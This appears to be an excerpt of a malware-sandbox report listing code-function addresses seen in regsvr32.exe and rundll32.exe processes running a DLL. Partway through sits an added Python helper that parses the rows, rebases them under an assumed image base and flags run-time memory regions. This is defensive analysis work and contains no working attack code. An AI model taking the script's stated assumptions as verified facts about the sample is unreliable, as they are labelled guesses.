                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800021782_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024D802_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800185982_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800035982_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A9A82_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800119A82_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025DAC2_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018DAC2_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800269B02_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800059B82_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800029BC2_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800141C02_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800125C42_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800121CC2_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BDD02_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800075D42_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800095DC2_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9E82_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800026102_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800196182_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FA382_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A2702_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019E782_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DA802_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800246982_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000EE982_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800176B82_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AAB82_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011AD02_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008AD82_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800296EC2_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A6EC2_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800132F02_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800193002_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BB042_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002870C2_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180026B102_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000131C2_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000671C2_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029B282_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180012F282_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BB282_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EB302_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800203342_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800107582_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001435C2_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009F5C2_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800293682_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800207682_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800173782_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800137802_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800153882_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000338C2_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000738C2_2_000000018000738C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800027902_2_0000000180002790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027F9C2_2_0000000180027F9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800197A02_2_00000001800197A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C7B42_2_000000018002C7B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DFB42_2_000000018001DFB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F7C02_2_000000018001F7C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800097C02_2_00000001800097C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800157D82_2_00000001800157D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019FDC2_2_0000000180019FDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017BDC2_2_0000000180017BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F7E02_2_000000018000F7E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001FE02_2_0000000180001FE0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010FF4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002C058
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180009100
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000C608
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180021618
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001E3AC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001DBE8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001FC0C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000580C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180022010
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001481C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002A42C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180011834
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180021C3C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000703C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000AC48
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000FC48
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180006458
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001C05C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001A460
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180029888
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001D49C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180008CA0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800248A8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180015CB0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800124B4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000C4B4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800288B8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800024B8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000D8C4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800250CC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800190D4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180017CE4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800264F0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800014F8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180020CFC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002C904
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180017908
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180021510
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000F917
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000551C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000F128
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001CD38
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180016D3C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001F944
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180018148
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001ED50
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180013150
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001D950
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001E960
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180019D60
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001C964
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180001D68
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001496C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180002D70
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180002178
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180024D80
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180018598
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180003598
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002A9A8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800119A8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180025DAC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180018DAC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800269B0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800059B8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800029BC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800141C0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800125C4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800121CC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800075D4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800095DC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000F9E8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180019618
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180013E28
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001FA38
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000A270
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180019E78
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001DA80
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180024698
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000EE98
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800176B8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001AAB8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180011AD0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180008AD8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800296EC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000A6EC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800132F0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180019300
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001BB04
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002870C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180026B10
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000131C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000671C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180029B28
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180012F28
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000BB28
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001EB30
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180020334
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010758
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001435C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180009F5C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180029368
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180020768
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180017378
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180013780
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180015388
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000338C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000738C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180002790
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800197A0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002C7B4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001DFB4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001F7C0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800097C0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800157D8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180019FDC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180017BDC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000F7E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180001FE0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000014E051A0000
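The rows in this listing are flattened table cells: the process path runs straight into the "Code function:" label and every function id is printed twice. The Python below is an added example for working with rows in that form; it is not part of the Joe Sandbox report or its tooling. It parses each row, rebases the sandbox virtual address to an RVA under an assumed preferred image base of 0x180000000 (an assumption drawn from the fact that every in-image hit on this page has the form 0x18000xxxx; IMAGE_SPAN is likewise an assumed upper bound on the image size), reports which RVAs recur across the regsvr32.exe and both rundll32.exe processes, and flags addresses that fall outside the image, such as 3_2_0000014E051A0000 directly above, which cannot be an offset into the registered DLL and so points at memory mapped at run time. The sample rows are constructed from this page.

```python
import re
from collections import defaultdict

# Constructed sample: a few rows copied in the report's flattened form.
# The real listing has several hundred such rows across three processes.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800220102_2_0000000180022010
Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001481C2_2_000000018001481C
Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800220103_2_0000000180022010
Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000014E051A00003_2_0000014E051A0000
Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800220104_2_0000000180022010
Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C9644_2_000000018001C964
"""

# Assumption: the DLL's preferred base is 0x180000000 (every in-image hit on the
# page is 0x18000xxxx). IMAGE_SPAN is an assumed generous bound on the image size.
IMAGE_BASE = 0x180000000
IMAGE_SPAN = 0x10000000

# One row: "Source: <path>.exe" fused to "Code function: <pid>_<run>_<16 hex>",
# followed by a duplicate of the id that the extraction appended. Only the first
# copy is captured; the duplicate is ignored.
LINE_RE = re.compile(
    r"Source:\s*(?P<source>.+?\.exe)"
    r"Code function:\s*"
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]{16})"
)


def parse_code_functions(text):
    """Return a list of (source_path, pid, run, virtual_address) from report rows."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # headings, blank lines, rows from other signatures
        hits.append((m.group("source"), int(m.group("pid")),
                     int(m.group("run")), int(m.group("addr"), 16)))
    return hits


def to_rva(addr, base=IMAGE_BASE, span=IMAGE_SPAN):
    """Rebase a sandbox VA to an RVA usable in IDA/Ghidra, or None if outside the image."""
    if base <= addr < base + span:
        return addr - base
    return None


def summarize(hits):
    """Group RVAs by process and separate out addresses that are not inside the image."""
    by_pid = defaultdict(set)
    non_image = []
    for _source, pid, _run, addr in hits:
        rva = to_rva(addr)
        if rva is None:
            non_image.append((pid, addr))  # run-time allocated code, e.g. an unpacked stage
        else:
            by_pid[pid].add(rva)
    pids = sorted(by_pid)
    common = set.intersection(*(by_pid[p] for p in pids)) if pids else set()
    # RVAs seen in exactly one process: candidates for paths only exercised there
    only_in = {p: by_pid[p] - set().union(*(by_pid[q] for q in pids if q != p))
               for p in pids}
    return {"by_pid": dict(by_pid), "common": common,
            "only_in": only_in, "non_image": non_image}


if __name__ == "__main__":
    summary = summarize(parse_code_functions(SAMPLE_LINES))
    for pid, rvas in sorted(summary["by_pid"].items()):
        print(f"pid {pid}: {len(rvas)} in-image functions")
    print("common RVAs:", sorted(hex(r) for r in summary["common"]))
    for pid, rvas in summary["only_in"].items():
        print(f"only in pid {pid}:", sorted(hex(r) for r in rvas))
    for pid, addr in summary["non_image"]:
        print(f"pid {pid}: {addr:#x} is outside the image (not a DLL offset)")
```

Feed the whole listing to `parse_code_functions` and the common set gives the RVAs to start from in a disassembler; the `non_image` entries are the addresses worth dumping from the sandbox's memory snapshots rather than looking up in the file.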
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180010FF4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018002C058
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180009100
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018000C608
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180021618
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001E3AC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001DBE8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001FC0C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018000580C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180022010
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001481C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018002A42C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180011834
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180021C3C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018000703C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018000AC48
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018000FC48
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180006458
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001C05C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001A460
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180029888
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001D49C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180008CA0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800248A8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180015CB0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800124B4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018000C4B4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800288B8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800024B8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018000D8C4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800250CC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800190D4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180017CE4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800264F0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800014F8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180020CFC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018002C904
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180017908
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180021510
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018000F917
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018000551C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018000F128
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001CD38
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180016D3C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001F944
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180018148
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001ED50
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180013150
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001D950
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001E960
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180019D60
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001C964
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180001D68
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018001496C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180002D70
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180002178
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180024D80
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180018598
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180003598
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_000000018002A9A8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800119A8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180025DAC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000000180018DAC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800269B0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800059B8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800029BC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800141C0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800125C4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800121CC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800075D4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F9E84_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800026104_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800196184_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013E284_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FA384_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A2704_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019E784_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DA804_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800246984_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000EE984_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800176B84_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AAB84_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180011AD04_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008AD84_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800296EC4_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A6EC4_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800132F04_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800193004_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BB044_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002870C4_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180026B104_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000131C4_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000671C4_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029B284_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180012F284_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000BB284_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001EB304_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800203344_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800107584_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001435C4_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180009F5C4_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800293684_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800207684_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800173784_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800137804_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800153884_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000338C4_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000738C4_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800027904_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800197A04_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C7B44_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DFB44_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F7C04_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800097C04_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800157D84_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019FDC4_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017BDC4_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F7E04_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001FE04_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000002BE35A900004_2_000002BE35A90000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_004F00005_2_004F0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180010FF45_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180028C205_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C0585_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001ACA45_2_000000018001ACA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000551C5_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800181485_2_0000000180018148
